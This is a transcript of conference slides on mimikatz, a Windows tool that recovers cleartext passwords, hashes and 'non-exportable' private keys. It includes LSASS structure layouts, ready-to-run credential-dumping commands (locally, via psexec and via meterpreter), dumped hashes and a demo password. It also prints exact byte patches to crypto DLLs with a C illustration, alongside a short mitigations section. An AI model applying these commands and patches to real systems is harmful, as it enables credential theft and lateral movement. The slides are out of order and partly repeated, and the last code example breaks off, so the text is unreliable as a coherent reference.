- When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESx
[Diagram: LsaUnprotectMemory keys on NT5, copied from the lsass process (lsasrv) into mimikatz's own lsasrv: g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8]). Once copied, LsaUnprotectMemory runs in mimikatz with LSASS's keys.]
mimikatz :: sekurlsa :: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES
[Diagram: LsaUnprotectMemory keys on NT6, copied from the lsass process (lsasrv) into mimikatz: InitializationVector (BYTE[16]), h3DesKey and hAesKey (BCrypt key handles, laid out as below).]

    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE data;  /* etc. */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle;
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages

    Package          Symbols                                                 Type
    tspkg            tspkg!TSGlobalCredTable                                 RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                                   LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList                      LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList                           LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                    RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList, lsasrv!LogonSessionListCount   LIST_ENTRY, ULONG

Protection Keys

    Key    NT 5 Symbols
    RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
    DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

    Key    NT 6 Symbols
           lsasrv!InitializationVector
    3DES   lsasrv!h3DesKey
    AES    lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:

    mimikatz privilege::debug sekurlsa::logonPasswords full exit

    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit

    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

    mimikatz 1.0 x64 (RC) Traitement du Kiwi (Aug 2 2012 01:32:28)
    http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

    mimikatz # sekurlsa::logonPasswords full

    Authentification Id        : 0;234870
    Package d'authentification : NTLM
    Utilisateur principal      : Gentil Kiwi
    Domaine d'authentification : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp : n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do

Basics:
– No physical access to the computer (it is the first step to pass-the-hash, then pass-the-pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless!)
– For privileged accounts, network logon instead of interactive logon (when possible)
– Audit: pass-the-hash leaves traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks

More in depth:
– Force strong authentication (SmartCard & Token) $$$ €€€
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic providers:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop using shared secrets for authentication, push public/private stuff (like keys ;))
– Take the opportunities to drop backward compatibility
– Disable faulty providers:
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?

A little module that I wrote to:
– play with the Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are "not" exportable

What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public part in DER format
    – with private keys in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI, in mimikatz context
  • CNG, in LSASS context (again!)
mod_mimikatz_crypto

mimikatz :: crypto :: how it's protected

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"

Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Password and popup protection: a constraint for most users, and unavailable for computer keys.)

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader…
– cryptdll.dll, rsaenh.dll, …

Processes deal with cryptographic keys through this API… inside their own address space.
mimikatz :: crypto :: capi :: how it's exported (… level)

Flow (slide diagram, simplified): the process asks the CryptoAPI / RSA CSP to export a key. The CSP checks the "exportable" flag: yes → DPAPI decode → load private key → exported key; no → NTE_BAD_KEY_STATE. The CSP, the check and the decoded key all live in the calling process.
mimikatz :: crypto :: patchcapi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz and certutil on a non-exportable CAPI key (French console output translated):

  mimikatz # crypto::exportCertificates
  Location : 'CERT_SYSTEM_STORE_CURRENT_USER\My'
   - Benjamin Delpy
      Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
      Provider      : Microsoft Enhanced Cryptographic Provider v1.0
      Type          : AT_KEYEXCHANGE
      Exportable    : NO
      Key size      : 2048
      Private export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
      Public export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

  ================ Certificate 0 ================
  Serial Number: 112169417a1c3ef46a301f99385f50680fa0
  Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Subject: CN=Benjamin Delpy, C=FR
  Non-root Certificate
  Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider = Microsoft Enhanced Cryptographic Provider v1.0
  Private key is NOT exportable
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.
mimikatz :: crypto :: patchcapi :: because I own my process

So what? A module in my own process tells me that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space: two 2-byte patches, one per check.
Before (rsaenh.dll, the export check and its preparation step):
  .text:0AC0B7CB  0F 85 33 C7 FF FF   jnz  continue_key_export_or_archive
  .text:0AC1F749  0F 85 B6 3B FF FF   jnz  continue_key_export_or_archive_prepare

After (the nop comes first so that the 5-byte jmp ends where the 6-byte jnz ended; the rel32 displacement is unchanged):
  .text:0AC0B7CB  90                  nop
  .text:0AC0B7CC  E9 33 C7 FF FF      jmp  continue_key_export_or_archive
  .text:0AC1F749  90                  nop
  .text:0AC1F74A  E9 B6 3B FF FF      jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time

Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi :: limitations

Because:
– I'm lazy
– In the majority of cases I've seen RSA keys in real-life use
  • Elliptic Curve, a little…

mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions, which run inside LSASS.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported (… level)

Flow (slide diagram, simplified): the process asks CNG to export a key; CNG forwards the request over RPC to the KeyIso service, hosted in the LSASS process. There the "exportable" flag is checked: yes → DPAPI decode → load private key → exported key back over RPC; no → NTE_NOT_SUPPORTED. On NT6, LSASS is a SYSTEM process protected by the ML_SYSTEM mandatory label (SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP), so the check and the decoded key are out of reach of a normal user process.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) : ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz on a non-exportable CNG key (French console output translated):

  mimikatz # crypto::exportKeys [user]
  CNG keys :
   - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Exportable : NO
      Key size   : 2048
      Private export in 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
Before (ncrypt.dll, the export check):
  .text:6C815210  75 1C   jnz  short continue_key_export
After (same length and same rel8 displacement, only the opcode changes):
  .text:6C815210  EB 1C   jmp  short continue_key_export
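The two patch listings above (rsaenh.dll for patchcapi, ncrypt.dll for patchcng) as one added C example; this is not mimikatz code. It applies the same opcode rewrite to local copies of the instruction bytes printed on the slides, then decodes the branch target before and after to show why the nop precedes the jmp in the 6-byte case and why the CNG site needs a single byte. The addresses are the slide's; nothing here maps rsaenh.dll or opens LSASS.

```c
/* Added example (not mimikatz code): rewrite jnz -> jmp the way the
 * crypto::patchcapi / patchcng patches do, on an in-memory copy of the
 * bytes from the slides, and check the branch target is unchanged. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Little-endian rel32 at code[off..off+3], sign-extended. */
static int32_t rel32_at(const uint8_t *code, size_t off) {
    return (int32_t)((uint32_t)code[off] | (uint32_t)code[off + 1] << 8 |
                     (uint32_t)code[off + 2] << 16 | (uint32_t)code[off + 3] << 24);
}

/* Target of the x86 jump encoded at virtual address `va`:
 * next-instruction VA + displacement. 0 if the encoding is not handled. */
uint32_t branch_target(uint32_t va, const uint8_t *code) {
    if (code[0] == 0x0F && (code[1] == 0x84 || code[1] == 0x85))   /* jz/jnz rel32, 6 bytes */
        return va + 6 + (uint32_t)rel32_at(code, 2);
    if (code[0] == 0xE9)                                            /* jmp rel32, 5 bytes */
        return va + 5 + (uint32_t)rel32_at(code, 1);
    if (code[0] == 0x74 || code[0] == 0x75 || code[0] == 0xEB)      /* jz/jnz/jmp rel8, 2 bytes */
        return va + 2 + (uint32_t)(int32_t)(int8_t)code[1];
    return 0;
}

/* Make the jnz at `code` unconditional. Returns bytes rewritten: 2 per
 * rel32 site (the "4 bytes" of patchcapi's two sites), 1 for the rel8
 * site of patchcng, 0 if the bytes are not a jnz. */
size_t force_jump(uint8_t *code) {
    if (code[0] == 0x0F && code[1] == 0x85) {
        /* 0F 85 rel32 -> 90 E9 rel32: the nop goes first so the 5-byte jmp
         * ends exactly where the 6-byte jnz ended and rel32 still counts
         * from the same next-instruction address. */
        code[0] = 0x90;
        code[1] = 0xE9;
        return 2;
    }
    if (code[0] == 0x75) {          /* 75 rel8 -> EB rel8: same length, same rel8 */
        code[0] = 0xEB;
        return 1;
    }
    return 0;
}

/* Patch one site in place; returns 1 if the target survived. For the
 * rel32 form the jmp now starts one byte later, after the nop. */
int patch_site_keeps_target(uint32_t va, uint8_t *code, size_t *written) {
    uint32_t before = branch_target(va, code);
    size_t n = force_jump(code);
    if (n == 0 || before == 0)
        return 0;
    size_t skip = (n == 2) ? 1 : 0;
    uint32_t after = branch_target(va + (uint32_t)skip, code + skip);
    if (written) *written += n;
    return before == after;
}

int main(void) {
    /* Instruction bytes copied from the slides (x86 builds). */
    uint8_t capi1[] = {0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF};   /* rsaenh .text:0AC0B7CB */
    uint8_t capi2[] = {0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF};   /* rsaenh .text:0AC1F749 */
    uint8_t cng[]   = {0x75, 0x1C};                           /* ncrypt .text:6C815210 */
    size_t capi_bytes = 0, cng_bytes = 0;
    int ok1 = patch_site_keeps_target(0x0AC0B7CBu, capi1, &capi_bytes);
    int ok2 = patch_site_keeps_target(0x0AC1F749u, capi2, &capi_bytes);
    int ok3 = patch_site_keeps_target(0x6C815210u, cng, &cng_bytes);
    printf("patchcapi: %zu bytes written, targets kept: %d %d\n", capi_bytes, ok1, ok2);
    printf("patchcng : %zu byte written, target kept: %d\n", cng_bytes, ok3);
    return (ok1 && ok2 && ok3) ? 0 : 1;
}
```

The order of the two bytes is the whole trick: writing `E9` first and the nop second would shift the displacement base by one and land the jump one byte short of the original target.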
mimikatz :: crypto :: patchcng :: demo time

Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations

The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
mimikatz :: crypto :: patchcng :: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export work too
– Yeah, like the good old certutil
certutil on the same non-exportable CNG key, before and after the LSASS patch (French console output translated):

  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
  MY
  ================ Certificate 1 ================
  […]
  Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Provider = Microsoft Software Key Storage Provider
  Private key is NOT exportable
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.

  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
  MY
  ================ Certificate 1 ================
  […]
  Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Provider = Microsoft Software Key Storage Provider
  Encryption test passed
  CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto :: memo

Some commands:
  mimikatz # crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
  mimikatz # privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do

Exactly the same as for sekurlsa: it will prevent access to accounts/computer
– no admin, no admin, no admin…

Basics:
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth:
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendor implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?

– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM / AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– Applocker / SRP bypass
– Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters actions
  • List Notifications (process, thread, image, registry)
  • List Objects hooks and procedures
  • …
– …
mimikatz :: that's all folks

Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– the Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention

Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact

blog      http://blog.gentilkiwi.com
mimikatz  http://blog.gentilkiwi.com/mimikatz
source    https://code.google.com/p/mimikatz
email     benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg :: demo time

  sekurlsa::tspkg

mimikatz :: sekurlsa :: wdigest
because clear text passwords over http/https are not cool
mimikatz :: sekurlsa :: wdigest :: what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]"
Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios:
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP"
Microsoft, http://technet.microsoft.com/library/cc778868.aspx

Again it seems cool:
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?

We speak about hashes, but what hashes?
  H   = MD5(HA1:nonce:[…]:HA2)
  HA1 = MD5(username:realm:password)
  HA2 = MD5(method:digestURI[…])

Even after login HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.
So the WDigest provider must keep the elements needed to compute responses for different servers:
– Username
– Realm (from the server)
– Password
mimikatz :: sekurlsa :: wdigest :: theory

This time we know
– that WDigest keeps the password in memory « by protocol », for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)

LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE (x86)
– Let's search for it in WDigest
– Hypothesis verified: it is called from the HA1 computation

LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE (x86)
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts the data in the doubly linked list wdigest!l_LogSessList

  .text:7409D151  _DigestCalcHA1@8         call dword ptr [eax+0B4h]   ; LsaUnprotectMemory
  .text:74096C69  _SpAcceptCredentials@16  call dword ptr [eax+0B0h]   ; LsaProtectMemory
mimikatz :: sekurlsa :: wdigest :: workflow

Workflow (slide diagram): LsaEnumerateLogonSessions → for each LUID: search the linked list wdigest!l_LogSessList for that LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory on the Password field → password in clear.

  typedef struct _KIWI_WDIGEST_LIST_ENTRY {
      struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
      struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
      DWORD UsageCount;
      struct _KIWI_WDIGEST_LIST_ENTRY *This;
      LUID LocallyUniqueIdentifier;
      […]
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
      […]
  } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time

  sekurlsa::wdigest

mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?

Until now I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~… let's be more brutal this time: set a WinDbg trap
  0: kd> !process 0 0 lsass.exe
  PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
      DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
      Image: lsass.exe
  0: kd> .process /i 83569040
  You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context.
  0: kd> g
  Break instruction exception - code 80000003 (first chance)
  nt!RtlpBreakWithStatusInstruction:
  814b39d0 cc              int     3
  0: kd> .reload /user
  Loading User Symbols
  0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
  0: kd> g
mimikatz :: sekurlsa :: livessp : how?
Let's log in with a Live account on Windows 8.
After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
Trap output (kc 5 at each LsaProtectMemory call during the Live logon):

  lsasrv!LsaProtectMemory
  livessp!LiveMakeSupplementalCred
  livessp!LiveMakeSecPkgCredentials
  livessp!LsaApLogonUserEx2          <- our LiveSSP provider
  livessp!SpiLogonUserEx2

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential     <- yeah! Pass-the-Hash capability with a Live account too…
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword               <- a Live user can log on through RDP via SSO
  tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp : workflow
  LsaEnumerateLogonSessions
    -> for each LUID
      -> search the linked list livessp!LiveGlobalLogonSessionList for the LUID
         (KIWI_LIVESSP_LIST_ENTRY)
        -> suppCreds (KIWI_LIVESSP_PRIMARY_CREDENTIAL)
          -> LsaUnprotectMemory on Password
            -> password in clear

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account.
After credential protection, KerbCreateLogonSession calls:
 - NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
 - NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList
Trap output (kc 5 at each LsaProtectMemory call during a normal logon):

  lsasrv!LsaProtectMemory
  kerberos!KerbHideKey                  <- Kerberos ticket part? Maybe ;)
  kerberos!KerbCreatePrimaryCredentials
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  kerberos!KerbHidePassword             <- Kerberos part for the password
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  wdigest!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) : workflow
  LsaEnumerateLogonSessions
    -> for each LUID
      -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable
         (KIWI_KERBEROS_PRIMARY_CREDENTIAL)
        -> LsaUnprotectMemory on Password
          -> password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) : workflow
  LsaEnumerateLogonSessions
    -> for each LUID
      -> search the linked list kerberos!KerbLogonSessionList for the LUID
         (KIWI_KERBEROS_LOGON_SESSION)
        -> LsaUnprotectMemory on Password
          -> password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time!
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos : "hu?"
OK, it works… but why?
Not at all logons on NT5 (an unlock can be needed).
From my understanding of Microsoft's explanations:
 - no need for passwords in the Kerberos protocol…
 - all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logical…
 - for password auth:
   * the password hash is the shared secret, but the password is kept in memory
 - for full smartcard auth:
   * no password on the client
   * no hash on the client
     - NTLM hash on the client…
     - the KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them:
 - this function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.
Can it be fun to decrypt outside the process?
 - Yes, it is… no more injection, just reading the memory of the LSASS process…
mimikatz can load lsasrv.dll too, and "imports" the keys LSASS initialized:
 - when we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS.
mimikatz :: sekurlsa :: LsaEncryptMemory : NT5
Depending on the size of the secret, LsaEncryptMemory (the function behind LsaUnprotectMemory) uses:
 - RC4
 - DESx
[Figure: NT5 key material. In lsass, lsasrv.dll holds g_cbRandomKey (DWORD, 256), g_pRandomKey (-> BYTE[g_cbRandomKey]), g_pDESXKey (-> BYTE[144]) and g_Feedback (BYTE[8]). mimikatz loads its own copy of lsasrv and copies these values into it.]
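The list walk from the livessp and kerberos (nt5) workflow slides above, combined with the out-of-process idea (read LSASS memory, copy lsasrv's keys, decrypt locally), as an added example. This is an illustration written for this page, not mimikatz code. It runs against a constructed byte array standing in for the LSASS address space, with simplified structures (image offsets play the role of pointers, only the LUID and Password members are kept) and a constructed 16-byte key, and implements only the RC4 branch. The selection rule it enforces (sizes that are a multiple of 8 go to the block cipher, DESx on NT5, everything else to RC4) is taken from the mimikatz source rather than from the slide, which only says the choice depends on the size; the `read_remote()` stand-in is where a real tool would call ReadProcessMemory on a handle to lsass.exe.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMG_SIZE 0x200
static uint8_t g_image[IMG_SIZE];   /* stands in for the LSASS address space */

/* Simplified 32-bit layouts (image offsets play the role of pointers); the
   real KIWI_* structures on the slides carry more fields. */
typedef struct {
    uint32_t Flink, Blink;                  /* LIST_ENTRY */
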